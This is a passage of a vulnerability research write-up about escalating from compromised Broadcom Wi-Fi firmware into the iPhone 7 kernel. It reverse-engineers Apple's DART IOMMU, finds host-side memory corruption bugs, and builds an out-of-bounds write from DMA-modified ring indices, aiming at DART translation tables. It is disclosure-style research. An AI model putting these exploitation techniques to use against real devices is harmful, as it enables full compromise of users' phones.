Having located the engine, all that remains is to dump the RX descriptor ring and extract the addresses to which DMA transfers are performed. Unfortunately, descriptors are rapidly consumed after being inserted into the corresponding rings, replacing their contents with generic placeholder values. Therefore, observing the value of a non-consumed descriptor from a single memory snapshot is tricky. Instead, to extract “fresh” descriptors, we’ll insert a hook on the DMA transfer function, allowing us to dump descriptor addresses before they are inserted into the corresponding rings.

After inserting the hook, we are presented with the following output:

All of the descriptor addresses appear to be 32-bits wide...

How do the above addresses relate to our knowledge of the physical address space on the iPhone 7? The DRAM’s base address in the host’s physical address space is denoted by the “gPhysBase” variable (stored in the kernel’s BSS). Reading this value from our research platform will allow us to determine whether the DMA descriptor addresses correspond to host-side physical ranges:

Ah-ha! The iPhone 7’s DRAM is based at 0x800000000 -- an address beyond a 32-bit range.

Therefore, some form of conversion is taking place between the ranges visible to the Wi-Fi chip (IO-Space) and those corresponding to the host’s physical address space. To locate the root cause of this conversion, let’s shift our attention back towards the host.

The host and the Wi-Fi chip communicate with one another using a protocol designed by Broadcom, dubbed “MSGBUF”. Using the protocol, both endpoints are able to transmit and receive control messages, as well as traffic, through a set of “message rings”. Each ring is stored within the host’s memory, but is also made accessible to the firmware through DMA.

Since the rings must be accessible through DMA to the Wi-FI chip, locating the code responsible for their initialisation might shed some light on the process through which their physical addresses are converted to the DMA-accessible addresses we encountered in the firmware’s DMA descriptors.

Reverse-engineering AppleBCMWLANBusInterfacePCIe, we quickly arrive at the function responsible for initialising the IPC structures utilised by the Wi-Fi chip and the host, including the aforementioned rings:

1. void* init_ring(void* this, uint64_t alignment, IOMapper* mapper, ...) {
2. ...
3. IOOptionBits options = kIOMemoryTypeVirtual | kIODirectionOutIn;
4. IOBufferMemoryDescriptor* desc =
5. IOBufferMemoryDescriptor::inTaskWithOptions(kernel_task,
6. options,
7. capacity,
8. alignment);
9. ...
10. IODMACommand* cmd = IODMACommand::withSpecification(
11. IODMACommand::OutputLittle64, //outSegFunc
11. 0, //numAddressBits
12. 0, //maxSegmentSize
13. 0, //mappingOptions
14. 0, //maxTransferSize
15. 1, //alignment
16. mapper, //mapper
17. 0); //refCon
18 ...
19. cmd->setMemoryDescriptor(desc, true);
20. ...
21. }
function 0xFFFFFFF006D1C074

As we can see above, the function utilises I/O Kit APIs to manage and map DMA-capable descriptors.

Upon closer inspection, we can see that IODMACommand defers the actual mapping operations to the provided IOMapper instance (“mapper” in the snippet above). However, as luck would have it, the same “mapper” object is stored within the “PCIe object” we identified in the first part of our research. Therefore, we can proceed to extract the IOMapper instance and begin tracing through its associated code paths.

While the source code for IOMapper is available in the open-sourced portions of XNU, it does not perform any actual mapping operations, but rather delegates them to the “System Mapper” - a globally registered IOMapper instance. Since no concrete subclasses of IOMapper are present in the open-sourced portions of XNU, we can assume that a specialised subclass, performing the actual mapping implementation, exists in one of the proprietary KEXTs.

Indeed, following the extracted IOMapper’s virtual table, we arrive at the IODARTMapper class, under com.apple.driver.IODARTFamily -- it seems a specialised IOMapper is used after all!

Before we continue down the rabbit hole, let’s take a step back and assess the situation. According to Apple’s documentation, DART stands for “Device Address Resolution Table” -- a hardware component integrated into the memory controller, whose purpose it is to provide a separate address space mapping for 32-bit PCI peripherals. DART allows the system to map physical addresses beyond the 32-bit range to peripherals, and to provide fine-grained control over exposed memory ranges to each device. In short, this is non other than a proprietary IOMMU designed by Apple!

Digging deeper into IODARTMapper, we find iovmInsert; the entry point for inserting new IO-Space translations through a mapper. Passing through several more layers of indirection, we finally arrive at an instance of AppleS5L8960XDART.

The latter object originates in a different driver; com.apple.driver.AppleS5L8960XDART. It appears we’re getting closer to the bare-metal DART implementation for the SoC! Oddly, the driver references “S5L8960X”; the product code for the Apple A7 SoC (used in older iPhones, such as the 5s). Perhaps this artefact suggests that the same DART implementation has been used in prior SoC revisions.

Taking a closer look at AppleS5L8960XDART, we quickly come across a function of particular interest. This function performs many bit shifts and masks, much like we’d expect from translation-table management code. After spending some time familiarising ourselves with the code, we come to the realisation that the function is responsible for populating DART’s translation tables! Here is a high-level representation of the relevant code:

1. void* create_descriptors(void* this, uint64_t table_index,
2. uint32_t start_pfn, uint32_t map_size, ...) {
4. ... //Validate input arguments, acquire mutex
5. void** dart_table = ((void***)(this + 312))[table_index];
6. uint32_t end_pfn = start_pfn + map_size;
8. //Populating each L0 descriptor in the range
9. uint32_t l0_start_idx = (start_pfn >> 18) & 0x3;
10. uint32_t l0_end_idx = (end_pfn >> 18) & 0x3;
12. for (uint32_t l0_idx = l0_start_idx; l0_idx <= l0_end_idx; l0_idx++) {
14. //Creating the L1 table if it doesn’t already exist
15. struct l1_table_t* l1_table = (struct l1_table_t*)(dart_table[l0_idx]);
16. if (!l1_table) {
17. l1_table = allocate_l1_table(this);
18. dart_table[l0_idx] = l1_table;
19. uint64_t table_phys = l1_table->desc->getPhysicalSegment(...);
20. uint64_t l0_desc = ((table_phys >> 12) & 0xFFFFFF) | 0x80000000;
21. OSSynchronizeIO();
22. set_l0_desc(this, table_index, l0_idx, l0_desc);
23. }
25. //Calculating the range of L1 descriptors to populate
26. uint32_t l1_start_idx = (l0_idx == l0_start_idx) ?
27. (start_pfn >> 9) & 0x1FF : 0;
28. uint32_t l1_end_idx = (l0_idx == l0_end_idx) ?
29. (end_pfn >> 9) & 0x1FF : 511;
31. //Populating each L1 descriptor in the range
32. for (uint32_t l1_idx = l1_start_idx; l1_idx <= l1_end_idx; l1_idx++) {
34. //Creating the L2 table if it doesn’t already exist
35. struct l2_table_t* l2_table;
36. l2_table = (struct l2_table_t*)l1_table->l2_tables[l1_idx];
37. if (!l2_table) {
38. l2_table = allocate_l1_desc(this);
39. l1_table->l2_tables[l1_idx] = l2_table;
40. uint64_t table_phys = l2_table->desc->getPhysicalSegment(...);
41. l1_table->descriptors[l1_idx] = (table_phys & 0xFFFFFF000) | 3;
42. OSSynchronizeIO();
43. ...
44. }
45. }
46. }
47. ... //Release mutex
48. }
50. struct l1_table_t {
51. IOBufferMemoryDescriptor* desc; //Descriptor holding L1 table
52. uint64_t* descriptors; //Kernel VA ptr to L1 descs
53. struct l2_table_t* l2_tables[512]; //L2 descriptors within this table
54. };
56. struct l2_table_t {
57. IOBufferMemoryDescriptor* desc; //Descriptor holding L2 table
58. uint64_t* descriptors; //Kernel VA ptr to L2 descs
59. uint64_t unknown;
60. };
function 0xFFFFFFF0065978F0

Alright! Let’s take a moment to unpack the above function.

For starters, it appears that DART utilises a 3-level translation regime. The first level is capable of holding up to four descriptors, while each subsequent level holds 512 descriptors. Since DART uses a 4KB translation granule, we can deduce that, in ascending order, L2 table maps 0x200000 bytes into IO-Space, while L1 tables map up to 0x40000000 bytes.

In addition to the 3-level regime specified above, DART holds four “base descriptors”. Unlike regular descriptors, these are not indexed by bits in the IO-Space address, but are instead referenced explicitly using a parameter provided by the caller.

Drawing on our knowledge of PCIe, we can speculate on the nature of these “base descriptors”. Perhaps each DART can facilitate mappings for several different PCI peripherals on the same bus, where each “base descriptor” corresponds to one such device (based on the “Requester-ID” encoded in the incoming TLP)? Whether or not this is the case, dumping the “base descriptors” in the DART instance corresponding to the Wi-Fi chip reveals that only the first descriptor is populated in our case.

In order to access the DART mappings, two distinct sets of data structures are utilised in tandem; a set of “convenience” structures which map the translation hierarchy into high-level objects within the kernel’s virtual address space, and another set holding the descriptors themselves, which are linked together based on physical addresses. The former set is used by the kernel to conveniently locate and modify DART’s mappings, while the latter is used by DART’s hardware to perform the actual IO-Space translations.

Looking more closely at the descriptors, it appears that the translation format utilised by DART is proprietary, and does not match the formats present in the ARM VMSA (including those utilised by SMMUs). Nonetheless, we can deduce the descriptors’ composition by inspecting the code above, which constructs and populates descriptors across the translation hierarchy.

L0 descriptors encode the physical frame number (using a 4KB translation granule) corresponding to the next level table in the lower bits, and set the 31st bit to indicate a valid entry. L1 and L2 descriptors, on the other hand, use the bottom two bits to indicate validity (setting both bits denotes a valid entry, other combinations result in translation faults), while the top bits store the physical address of either the next translation table or of the 4KB region mapped into IO-Space.

Lastly, we must deduce IO-Space’s base address to complete our analysis of DART’s translation format. Drawing on our previous encounter with IO-Space addresses stored in the DMA descriptors within the Wi-Fi firmware, all the addresses appeared to be based at address 0x80000000. As such, it seems like a fair assumption that IO-Space mappings for the Wi-Fi chip begin at the aforementioned address.

Combining all of the information above, let’s build a module in our research platform to interact with the DART instance. The module will analyse DART’s translation tables, following the hierarchy described above. By analysing the translation tables, we can subsequently hold a mapping between IO-Space addresses and their corresponding physical ranges within the host’s PAS. Furthermore, we can invert the tables in order to produce a PAS to IO-Space mapping. Using these two mappings we can subsequently convert IO-Space addresses to physical addresses, and vice versa.

Finally, in addition to inspecting IO-Space, our DART module also allows us to manipulate IO-Space, by introducing new mappings into IO-Space containing whichever physical address we desire.

At long last, we can test whether our deductions regarding DART’s structure are indeed valid. First, let’s extract the DART instance corresponding to the Wi-Fi chip. Then, using this object, we can proceed to dump the entire mapping between IO-Space addresses and their corresponding physical ranges by following DART’s translation hierarchy:

Great! The first few mappings appear sane -- each IO-Space address is translated into a corresponding physical range well within the host’s PAS. Moreover, we can see that our assumption regarding DART’s translation granule holds, as some mapped physical addresses are within a 4KB range from one another.

To be absolutely certain that our assessment is valid, let’s perform another short experiment. We’ll map-in an unused IO-Space address, pointing it at a physical address corresponding to “spare” data within the kernel’s BSS. Next, using the DMA hook we inserted previously, we’ll direct unconsumed DMA descriptors at the newly mapped IO-Space address. By doing so, subsequent DMA transfers should arrive at our chosen BSS address.

After inserting the hook and monitoring the mapped BSS range (by reading it through the kernel’s VAS), we are presented with the following result:

Awesome! We managed to DMA into an arbitrary physical address within the kernel’s BSS, thus confirming that our understanding of DART is correct.
Exploring DART

Using our newly acquired control over IO-Space, we can proceed to conduct a few experiments.

For starters, it would be interesting to see whether the kernel integrity mechanisms present on the iPhone 7 (“KTRR”, previously referred to as “AMCC”), still hold in the presence of malicious DMA attempts from the Wi-Fi chip. To find out, we’ll map each of the protected physical ranges (the kernel’s code segments, read-only segments, etc.) into IO-Space, insert the DMA hook, and observe their contents to see whether they were successfully modified.

Unsurprisingly, each attempt to DMA into a protected region results in a fault being raised, subsequently triggering a kernel panic and crashing the device. Attempting to DMA into the KTRR’s hardware registers storing protected region ranges similarly fails -- once the lockdown occurs, no modification of the registers is permitted.

Continuing our analysis of DART, let’s consider another edge-case scenario: assume two subsequent IO-Space mappings correspond to non-contiguous ranges of physical memory. In such a case, should DMA operations crossing the boundary between the two IO-Space ranges be permitted? If so, should the data be split across the corresponding physical ranges? Or should the transfer instead only utilise the first physical range?

To find out, we’ll conduct another experiment. First, we’ll create two IO-Space mappings pointing at disparate regions in the Kernel’s BSS. Then, using the DMA engine, we’ll initiate a transfer crossing the boundary between the two IO-Space addresses.

Running the above experiment and monitoring the resulting addresses through the kernel’s VAS, we are presented with a positive result -- DART correctly splits the transaction into the two corresponding physical ranges, thus never exceeding any of the mapped-in regions’ bounds.

So far, so good.
PCIe Configuration Space

Continuing our investigation of DART, we arrive at another query -- how does DART perform context determination? Namely, how does DART differentiate between the components issuing the memory access requests?

Depending on DART’s architecture, several solutions to this question exist. If each DART is assigned to a single component or a single PCIe bus, no identification is needed, as it can simply funnel all operations from that origin through its translation mechanism. Alternately, if several PCIe components exist on the bus to which DART is assigned, it could utilise the “Requester ID” (RID) field in the PCIe TLP to identify the originating component.

Using the RID for context determination is not risk-free, as malicious PCIe components may attempt to “spoof” the contents of their TLPs. To deal with such scenarios, PCIe introduced Access Control Services (ACS), allowing PCIe switches to perform routing decisions, including disallowing transfer of certain TLPs based on their encompassed IDs. As we are not aware of the PCIe topology on the iPhone, it remains unknown whether such a configuration is needed (or used).

With regards to control over the PCIe TLPs, Broadcom’s Wi-Fi chips expose much of the PCIe Core’s functionality to the Wi-Fi firmware by mapping the core’s registers through a fixed backplane address. Previous Broadcom SoC revisions, which incorporated PCIe Gen 1 cores, allowed access to several “diagnostic” registers (via pcieindaddr / pcieinddata), which govern over the physical (PLP), data link (DLLP) and transport (TLP) layers of PCIe. Regardless, it is unknown whether the this mechanism allows modification of the RID, or indeed whether this form of access is still present in current-gen Broadcom hardware.

Nevertheless, standardised PCIe mechanisms exist which may also affect the RID’s composition. For instance, PCIe 3.0 introduced Alternate Routing-ID Interpretation (ARI), which modifies the encoding of the RID, eliminating the “device” field while expanding the “function” field to 8 bits.

While normally the PCIe Configuration Space is accessed through the host, Broadcom’s Wi-Fi SoC exposes the configuration space within the Wi-Fi SoC, through a pair of backplane registers corresponding to the PCIe Core (configaddr / configdata). Using these registers, the Wi-Fi firmware can not only read the PCIe Configuration Space, but also modify values within it. Like many advanced PCIe features, ARI is exposed in the configuration space through an “extended capability” blob; therefore, if ARI is supported by the PCIe core, we could utilise our access to the configuration space to enable the feature from the Wi-Fi firmware.

To determine whether such capabilities are present in the PCIe core, we’ll produce a dump of the configuration space (using the aforementioned register pair). After doing so, we can simply reorganise the contents in a format legible to lspci, and instruct it to parse the given data, producing a human-readable representation of the features supported by the PCIe core:

Scanning through the above capabilities, it appears that none of the “advanced” PCIe features (such as ARI) are supported by the PCIe core.
Exploring IO-Space

While we’ve already determined how DART facilitates the IO-Space mapping for the Wi-Fi chip, we have yet to investigate the contents of the memory exposed through this mechanism. In order to investigate IO-Space’s contents, we’ll use a two-stage translation process; first, we’ll use our DART module to produce a mapping between the IO-Space addresses and their corresponding physical ranges. Once we obtain the mapped physical ranges, all that remains is to map these ranges into the kernel’s VAS, allowing us to subsequently dump their contents using our research platform.

As we know, the mapping from virtual to physical addresses is governed by the MMU’s translation tables. On ARMv8-A platforms (such as the iPhone 7), the ARM Virtual Memory System Architecture (VMSA) specifies the format of the translation tables utilised by the ARM MMU. Like any XNU task, the kernel’s translation tables are accessible through its task_t structure (exported through its data segment). Following the entries in the task structure, we arrive at its pmap, holding the translation tables.

Putting the two together, we can write some code in our research framework to locate the kernel’s task, extract the internal translation tables, and encapsulate the data therein in a module representing an ARMv8 translation table.

Using our new module, we can now perform translations between the virtual addresses in the kernel’s VAS and physical ones. Furthermore, we can invert the translation table, producing a (one-to-many) mapping from physical to virtual addresses. In tandem with our DART module, this allows us to take each IO-Space address, convert it to a physical address, and then use our inverted translation table to convert it back to a virtual address in the kernel’s VAS.

Consequently, we can now iterate over the entire IO-Space exposed to the Wi-Fi chip, extracting the contents of every mapped region:

After producing a copy of the entire contents of IO-Space, we can now comb through it, searching for any “accidental” mappings that might be beneficial for a would-be attacker present on the Wi-Fi chip.

For starters, recall that the kernel protects itself against remote attackers by utilising KASLR. This mitigation introduces a randomised “slide” value, which is added to the kernel’s base loading address (both virtual and physical). Since many exploits rely on the ability to pre-calculate addresses within the kernel’s VAS, such a mitigation may slow down attackers, or hinder the reliability of exploits targeting the kernel.

However, as the same “slide” value is applied globally, it is often the case that a single “leaked” kernel VAS address results in a KASLR bypass (allowing attackers to deduce the slide’s value). Therefore, if any kernel virtual address is accidentally leaked in an IO-Space mapped page, the Wi-Fi chip may be able to similarly subvert KASLR.

Apart from the potential implications regarding KASLR, the presence of any kernel VAS pointer in IO-Space would be worrisome, as the pointer might be utilised by kernel code. Allowing a malicious Wi-Fi chip to corrupt its value may subsequently affect the kernel’s behaviour (perhaps even resulting in code execution).

To find out whether any kernel pointers are exposed through IO-Space, let’s scan through the extracted IO-Space pages, searching for 64-bit words corresponding to addresses within the kernel’s VAS. After going through every single page, we are greeted with a negative result; we can find no kernel VAS pointers in any IO-Space mapped page!

With a cursory investigation of IO-Space out of the way, we can now dig deeper, attempting to gain a better understanding of the IO-mapped contents. To this end, we’ll combine several approaches:
Inspect each page’s contents to look for hints regarding its role
Locate the kernel code responsible for interacting with the same IO-Space range
Check the IO-Space address against posted addresses in the Wi-Fi firmware
Use the Android driver as reference for any “strange” unidentified constructs

After performing the above steps, we are finally able to piece together a complete mapping of IO-Space (thus also concluding that no “accidental” mappings are present). It is important to note that since IO-Space is not subject to randomisation, the IO addresses are constant, and are not affected by the KASLR slide.

Searching For Vulnerabilities

Having explored the aspects relating to DART, IO-Space mappings, and low-level components, let’s proceed to inspect the more traditional attack surfaces exposed by the host.

Recall that the Wi-Fi chip and the host communicate with one another through a series of “rings”, mapped into IO-Space. Each ring facilitates the transfer of information in a single direction; either from the device to the host (D2H), or vice versa (H2D).

Among the messages transferred through message rings, “Control Messages” represent a rather abundant attack surface. These message are used to instruct the firmware to perform complex state-changing operations, such as creating additional message rings, deleting them, and even transporting high-level requests (ioctls) to be processed by the firmware.

Due to their complexity, control messages rely on a bidirectional communication channel; the “Control Submit” ring (H2D) allows the host to submit the requests to the device, while the “Control Complete” ring (D2H) is used by the device to return the results back to the host.

After committing messages to the D2H rings, the Wi-Fi firmware signals the host by writing to a “MailBox” register and triggering an MSI interrupt. This interrupt is subsequently handled by the host, which inspects the MailBox register, and notifies the corresponding (D2H) rings that data may be available for processing.

Tracing through the above flow, we reach the handler function for processing incoming control messages within the host. To assist in reverse-engineering these messages, we’ll utilise Broadcom’s Android driver (bcmdhd), which contains the definitions for the control structures, as well as the message codes corresponding to each request.


The encapsulating handler simply reads the “message type” field, and proceeds to delegate the message’s processing to a dedicated handler -- one per message type. Going over each of the handlers, we stumble across a memory corruption bug triggerable by the firmware. Incidentally, the bug was present in a handler for a message type which isn’t available in the Android driver.

Moving on, let’s set our sights on slightly higher targets in the protocol stack. Recall that control rings are also used to carry high-level control requests from the host to the firmware, dubbed “ioctls”. Each ioctl allows the host to either set a firmware-specific configuration value, or to retrieve its current value. As this channel is quite versatile, much of the high-level interaction between the host and the firmware is enacted through this channel, including retrieving the current channel, setting network configurations, and more.

However, like any other signal originating from the device, it is important to remember that “ioctls” can be co-opted by malicious Wi-Fi firmware. After all, an attacker controlling the Wi-Fi firmware can simply hook the “ioctl” handling function, thereby allowing full control over the contents transmitted back to the host.

Reverse-engineering the high-level driver, AppleBCMWLANCore, we quickly identify the entry point responsible for issuing ioctl requests from the host to the Wi-Fi firmware. Cross referencing the function, we find nearly 500 call sites, several of which act as wrappers for common functionality, thus revealing even more originating call sites. After going over each of the aforementioned sites, we discover several memory corruptions in their corresponding handlers.

Lastly, there’s one more communication channel to consider -- Broadcom allows the in-band transmission of “event packets” from the Wi-Fi firmware to the host. These frames, denoted by a unique EtherType (0x886C), carry unsolicited events from the firmware, requiring special handling by the host. Tracing through the host’s RX path brings us to the entry point for handling such frames:


Once again, going over each handler in the above function (while using the Android driver to assist our understanding of the corresponding event codes and data structures), we discover two more vulnerabilities.
Better Vulnerabilities
Data Races?

While the vulnerabilities we just discovered allow us to trigger several forms of memory corruptions in the host (OOB writes, heap overflows), and even to leak constrained data from the host to the firmware, reliably exploiting any of them remains rather challenging.

For starters, the Wi-Fi chip has no visibility into the host’s memory (apart from the IO-Space mapped regions), and relatively little control over objects allocated within the kernel. Therefore, grooming the kernel’s memory in order to successfully launch a heap memory corruption attack would require significant effort. What’s more, this challenge is compounded by the presence of KASLR, preventing us from accurately locating the kernel’s data structures (barring any information disclosure).

Nonetheless, perhaps we can identify better primitives by digging deeper!

So far, we’ve only considered the contents of the data transferred between the host and the firmware. Effectively, we were thinking of the firmware and the host as two distinct entities, communicating with one another through an isolated communication channel. In fact, nothing can be further from the truth -- the two endpoints share a PCIe interface, allowing the firmware to perform DMA accesses at will to any IO-Space address.

One of the major risks when using a shared memory interface is the matter of timing. While the host and firmware normally synchronise their operations to ensure that no data races occur, attackers controlling the Wi-Fi firmware are bound by no such agreement. Using our control over the Wi-Fi chip, we can intentionally modify data structures within IO-Space as they are being accessed by the host. Doing so might allow us to introduce race conditions, such as TOCTTOUs, creating vulnerable conditions in otherwise safe code (under normal assumptions).

The first target for such modification are the control messages we inspected earlier on. Inspecting the control ring handler in the host, it appears that the messages are read directly from the IO-Space mapped buffer, raising the possibility for data races in their processing. Nonetheless, going over the relevant code paths, we find no security-relevant races.

What about the second control channel we reviewed -- event packets? Perhaps we could modify a packet’s contents while it is being processed, thereby affecting the kernel’s behaviour? Once again, the answer is negative; each transferred packet is first copied from its IO-Space mapped buffer to a kernel-resident mbuf before subsequently passing it on for processing, thus eliminating the possibility of firmware-induced races.
Message Rings, Revisited

So far, we’ve inspected the high-level functionality provided by message rings, namely, the control messages transported therein. However, we’ve neglected several aspects of their operation. One implementation detail of particular note is the method through which rings allow the endpoints to synchronise their accesses to the ring.

To allow concurrent accesses by both the ring’s consumer and its corresponding producer, each ring is assigned a pair of indices: a read index specifying the location up to which the consumer has read the messages, and a write index specifying the location at which the next message will be submitted by the producer. As their name implies, each ring forms a circular buffer -- upon arriving at the last ring index, the indices simply wrap around, returning back to the ring’s base.

Since both endpoints must be aware of the ring indices to successfully coordinate their access, a mechanism must exist through which the indices may be shared between the two. In Apple’s case, this is achieved by mapping all the indices into IO-Space mapped buffers.

While mapping the indices into IO-Space is a convenient way to share their values, it is not risk-free. For starters, if all the above indices are mapped into IO-Space, a malicious Wi-Fi chip may not only utilise DMA access to read them, but may also be able to modify them.

This form of access is excessive -- after all, the device need only update the read indices for H2D rings, and the write indices for D2H rings. The remaining indices should, at most, be read by the device. However, as DART’s implementation is proprietary, it is unknown whether it can facilitate read-only mappings. Consequently, all of the above indices are mapped into IO-Space as both readable and writable, thus allowing a malicious Wi-Fi chip to freely alter their values.

This IO-Space-based index sharing mechanism raises an important question; what if a Wi-Fi chip were to maliciously modify a ring’s indices while the ring is being processed by the host? Would doing so introduce a race condition? To find out, let’s take a look at the function through which the host submits messages into H2D rings:

1. void* AppleBCMWLANPCIeSubmissionRing::workloopSubmitTx(uint32_t* p_read_index,
2. uint32_t* p_write_index) {
4. //Getting the write index from the IO-Space mapped buffer (!)
5. uint32_t write_index = *(this->write_index_ptr);
7. //Iterating until there are no more events to process
8. while (this->getRemainingEvents(p_read_index, p_write_index)) {
10. //Calculate the next insertion address based on the write index
11. void* ring_addr = this->ring_base + this->item_size * write_index;
12. uint32_t max_events = this->calculateRemainingWriteSpace();
14 //Writing the current events to the ring
15. uint32_t num_written = this->submit_func(..., ring_addr, max_events);
16. if (!num_written)
17. break; //No more events to process
19. //Update the write index
20. write_index += num_written;
21. if (write_index >= this->max_index) {
22. write_index = 0; //Wrap around
24. //Commit the new index to the IO-Space mapped buffer (!)
25. *(this->write_index_ptr) = write_index;
26. }
27. ...
28. }
30. class AppleBCMWLANPCIeSubmissionRing {
31. ...
32. uint32 max_index; //The maximal ring index (off 88)
33. uint32 item_size; //The size of each item (off 92)
33. uint32_t* read_index_ptr; //IO-Space mapped read index pointer (off 174)
34. uint32_t* write_index_ptr; //IO-Space mapped write index pointer (off 184)
35. void* ring_base; //IO-Space mapped ring base address (off 248)
36. }
function 0xFFFFFFF006D36D04

Alright! Looking at the above function immediately raises some red flags…

The function appears to read values from IO-Space mapped buffers in several different locations, seemingly making no effort to coordinate the read values. This kind of pattern opens the door to the possibility of race conditions induced by the firmware.

Let’s focus on the “write index” utilised by the function. At first, the index is fetched by reading its value directly from the IO-Space mapped buffer (line 5). This same value is then used to derive the location to which the next ring item will be written (line 11). Crucially, however, the value is not used in any shape or form by the surrounding verifications utilised by the function to decide whether the current ring indices are valid (lines 8, 12).

Therefore, the verification methods must re-fetch the indices’ values, introducing a possible discrepancy between the value used during verification, and the one used to place the next item.

To exploit the above issue, an attacker controlling the Wi-Fi chip can DMA into the ring indices in order to introduce one value for the ring address calculation (line 5), while quickly switching the index to a different, valid value, for the remaining validations (lines 8, 12). If the above race is executed successfully, the following H2D item will be submitted by the host at an arbitrary attacker-controller offset from the ring’s base, triggering an out-of-bounds write!

Removing The Race Condition

While the above primitive is no doubt useful, it has one inherent downside -- performing a data race from an external vantage point may be a difficult feat, especially considering the platform we’re executing on (an ARM Cortex R) is significantly slower than the targeted one (a full-blown application processor).

Perhaps by gaining a better understanding of the primitive, we can deal with these limitations. To this end, let’s take a closer look at the validation performed by the submission function:

1. uint32_t AppleBCMWLANPCIeSubmissionRing::calculateRemainingWriteSpace() {
3. uint32_t read_index, write_index;
4. this->getIndices(&read_index, &write_index);
6. //Did the ring wrap around?
7. if (read_index > write_index)
8. return read_index - (write_index + 1);
9. else
10. return this->max_index - write_index + (read_index ? 0 : -1);
11. }
13. void AppleBCMWLANPCIeSubmissionRing::getIndices(uint32_t* rindex,
14. uint32_t* windex) {
15. uint32_t read_index = *(this->read_index_ptr);
16. uint32_t write_index = *(this->write_index_ptr);
17. if (read_index >= 0x10000 || write_index >= 0x10000)
18. panic(...);
19. *rindex = read_index;
20. *windex = write_index;
21. }
Ah-ha! Looking at the code above, we can identify yet another fault.

When fetching the ring indices, the getIndices function attempts to validate their values to ensure that they do not exceed the allowed ranges. This is undoubtedly a good idea, as it prevents corrupted values from being utilised (which may result in memory corruption).

However, instead of comparing the indices against the current ring’s capacity, they are compared against a fixed maximal value: 0x10000. While this value is certainly an upper bound on the rings’ capacities, it is far from a tight bound (in fact, most rings only hold several hundred items at-most).

Therefore, observing the code above we reach two immediate conclusions. First, if we were to attempt a race condition whereby the ring index is modified to a value larger than the fixed bound (0x10000), we run the risk of triggering a kernel panic should the race attempt fail (line 18). More importantly, however, modifying the write index to any value below the fixed bound (but still above the actual ring’s bounds), will allow us to pass the validations above, resulting in an out-of-bounds write with no race-condition required.

Using the above primitive, we can target any H2D ring, causing the next element to be reliably inserted at an out-of-bounds address within the kernel’s VAS! While the affected range is limited to the ring’s item size multiplied by the aforementioned fixed bound, as we’ll see later on, that’s more than enough.

Triggering the Primitive

Before pressing on, it’s important that we prove that the scenario above is indeed feasible. After all, many components within the kernel might utilise the modified ring indices, which, in turn, may enforce their own validations.

To do so, we’ll perform a short experiment using our research platform. First, we’ll select an H2D ring, and fetch its corresponding object within the kernel. Using the aforementioned object, we can then locate the ring’s base address, allowing us to inspect its contents. Now, we’ll modify the ring indices by utilising the firmware’s DMA engine, while concurrently monitoring the kernel virtual address at the targeted offset for modification. If the primitive is triggered successfully, we should expect an item to be inserted at the target offset from the ring’s base address.

However, running the above experiment results in a resounding failure! Every attempt to trigger the out-of-bounds write results in a kernel panic, thereby crashing the device. Inspecting the panic logs reveals the source of this crash:

It appears that when executing our attack, the firmware attempts to perform a DMA read operation from an address beyond its IO-Space mapped ranges! Taking a moment to reflect on this, the source of the error is immediately apparent: since both the firmware and the host share the ring indices through IO-Space, modifying the aforementioned values affects not only the host, but also the firmware’s implementation of the MSGBUF protocol.

Namely, the firmware attempts to read the ring’s contents using the corrupted indices, resulting in an out-of-bounds access to IO-Space, triggering the above panic.

As we have control over the firmware, we could simply try to intercept the corresponding code paths in its MSGBUF implementation, thus preventing it from issuing the malformed DMA request. Unfortunately, this approach is easier said than done - the firmware’s implementation of MSGBUF is woven into many code-paths in both the ROM and RAM; attempting to patch-out each part results in either breakage of a different component, or in undesired side-effects.

Instead of addressing the sources of the DMA transfers, we’ll go straight to the target -- the engine itself. Recall that each DMA engine on the firmware is accessible through an instance of a single structure (dma_info). Changing the DMA engine’s backplane register pointers within the dma_info structure would mean that while the calling code-paths are able to continue issuing malformed DMA requests, the requests themselves are never actually received by the DMA engine, thus preventing us from triggering a fault.

Indeed, incorporating the above patch into our vulnerability trigger, we can now freely modify the ring indices without inducing a crash. Furthermore, inspecting the corresponding kernel virtual at the targeted index, we can see that our overwrite is finally successful!
Devising An Exploit Plan

Having concluded that the primitive is usable, we can now proceed to the next stage -- devising an exploit plan. Namely, we must decide on a data structure to target using the exploit primitive, which may allow us to either modify the kernel’s behaviour, or otherwise gain a useful primitive bringing us closer to that goal.

So which data structure should we target? As we do not have any visibility into the kernel’s address space, reliably locating structures within the kernel presents quite a challenge. What’s more, our primitive only allows limited control over the written content (namely, the data written by the host is an H2D ring item). On top of that, each OOB element can only be written at offsets which are multiples of the ring’s item size, thus introducing alignment constraints.

The above limitations make reliable exploitation rather difficult. Alas, if only there were a data structure whose internal composition were relatively flexible, and to which a single modification would grant us complete control over the host…

...But of course, we’ve already come across the perfect target -- DART’s translation tables!

Recall that DART’s translation tables govern over the mapping between IO-Space and the host’s physical address space. If we were able to use our primitive in order to modify the tables, we might be able to introduce new mappings into IO-Space, pointing at arbitrary physical ranges within the host’s PAS. Mapping in arbitrary physical memory into the Wi-Fi chip is a nearly ideal primitive, as it would allow the chip to modify any data structure used by the kernel, leading to trivial code execution.

In order to successfully carry out such an attack, we must first figure out whether DART’s translation tables indeed constitute valid targets for the vulnerability primitive. Namely, we must figure out whether they reside within the primitive’s scope of influence.

However, scanning through the memory ranges within the primitive’s scope, we quickly come to the realisation that the placement of objects following the message rings is highly variable. Indeed, each device reboot yield an entirely different layout, thus preventing us from relying on any particular object being placed at any given offset from a message ring.

Perhaps we’re out of luck…?
Shaping IO-Space

...Instead of relying of lucky placement of nearby objects, let’s take matters into our own hands.

In order to place a DART translation table within the primitive’s scope, we’d need to either move a translation table into the primitive’s scope, or to move one of the message rings, thus shifting the primitive’s scope across different regions of the kernel’s memory.

The former approach seems infeasible; DART’s translation tables are only allocated when the IO-Space mappings are first populated (namely, when the Wi-Fi chip is first initialised). Once the mapping is complete, all of DART’s translation tables remain in their fixed positions within the kernel’s VAS.

But what about moving the rings? While control rings are immovable, a second set of ring exists -- “flow rings”. Flow rings are H2D rings used to facilitate the transfer of outgoing (TX) traffic. They do not carry the traffic itself, but rather notify the device of the transmitted frame’s metadata (including the IO-Space address at which its actual content is stored).

Unlike control rings, flow rings are far more “flexible”. Individual flows are dynamically added and removed as the need arises, by sending a corresponding control message from the host to the device. Each flow is identified by its endpoints (source and destination MAC), their encompassed protocol (i.e., EtherType), and their “priority”.

Perhaps we can use this dynamic nature of flow rings to our advantage. For example, if we were to delete a flow ring, it might subsequently get re-allocated at a different location in the kernel’s memory, thus shifting the scope of our OOB primitive to a possibly more “interesting” patch of objects.

